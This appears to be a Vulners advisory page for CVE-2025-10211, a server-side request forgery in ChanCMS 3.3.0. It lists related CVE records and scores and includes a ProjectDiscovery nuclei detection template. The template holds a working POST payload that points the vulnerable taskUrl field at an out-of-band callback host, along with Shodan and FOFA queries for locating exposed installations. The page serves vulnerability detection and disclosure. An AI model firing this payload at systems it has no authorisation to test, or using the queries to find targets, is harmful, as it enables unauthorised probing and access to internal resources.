Lucene search
K

ChanCMS <= 3.3.0 - Server-Side Request Forgery

🗓️ 03 Jun 2026 06:04:49Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 7 Views

ChanCMS 3.3.0 suffers SSRF via taskUrl in /cms/collect/getArticle, enabling remote requests.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-10211
29 Nov 202509:41
circl
CNNVD
ChanCMS 代码问题漏洞
10 Sep 202500:00
cnnvd
CNVD
ChanCMS Server-Side Request Forgery Vulnerability
12 Sep 202500:00
cnvd
CVE
CVE-2025-10211
10 Sep 202520:02
cve
Cvelist
CVE-2025-10211 yanyutao0402 ChanCMS getArticle CollectController server-side request forgery
10 Sep 202520:02
cvelist
EUVD
EUVD-2025-27613
3 Oct 202520:07
euvd
NVD
CVE-2025-10211
10 Sep 202520:15
nvd
Positive Technologies
PT-2025-37096
10 Sep 202500:00
ptsecurity
RedhatCVE
CVE-2025-10211
12 Sep 202520:47
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2025-10211
31 Jan 202600:00
vulncheck_kev
Rows per page
id: CVE-2025-10211

info:
  name: ChanCMS <= 3.3.0 - Server-Side Request Forgery
  author: Yu_Bao
  severity: medium
  description: |
    yanyutao0402 ChanCMS 3.3.0 contains a server-side request forgery caused by manipulation of the "taskUrl" argument in /cms/collect/getArticle, letting remote attackers make arbitrary requests, exploit requires no special privileges.
  impact: |
    Remote attackers can make arbitrary requests from the server, potentially accessing internal resources or sensitive data.
  remediation: |
    Update to the latest version of ChanCMS.
  reference:
    - https://gitee.com/yanyutao0402/ChanCMS
    - https://vuldb.com/?id.323484
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 6.3
    cve-id: CVE-2025-10211
    epss-score: 0.05966
    epss-percentile: 0.90815
    cwe-id: CWE-918
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.html:"ChanCMS"
    fofa-query: body="ChanCMS"
  tags: cve,cve2025,chancms,ssrf,oast,oob,vkev

http:
  - method: POST
    path:
      - "{{BaseURL}}/cms/collect/getArticle"

    headers:
      Content-Type: application/json

    body: |
      {
        "taskUrl": "http://{{interactsh-url}}",
        "titleTag": "title",
        "articleTag": "body",
        "parseData": "return data;"
      }

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'dns')
          - contains_all(response, 'success','article')
          - status_code == 200
        condition: and
# digest: 4a0a0047304502210091d6cc91cffe77bec5ff00bb506e42731c5c208720929c6f67077ab5ab078f8802206b7c6700fcb2d39414b48d85db301a2344818585316a55eb77e76c05ee542774:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 45.3
CVSS 3.16.3
CVSS 26.5
CVSS 36.3
EPSS0.05966
SSVC
7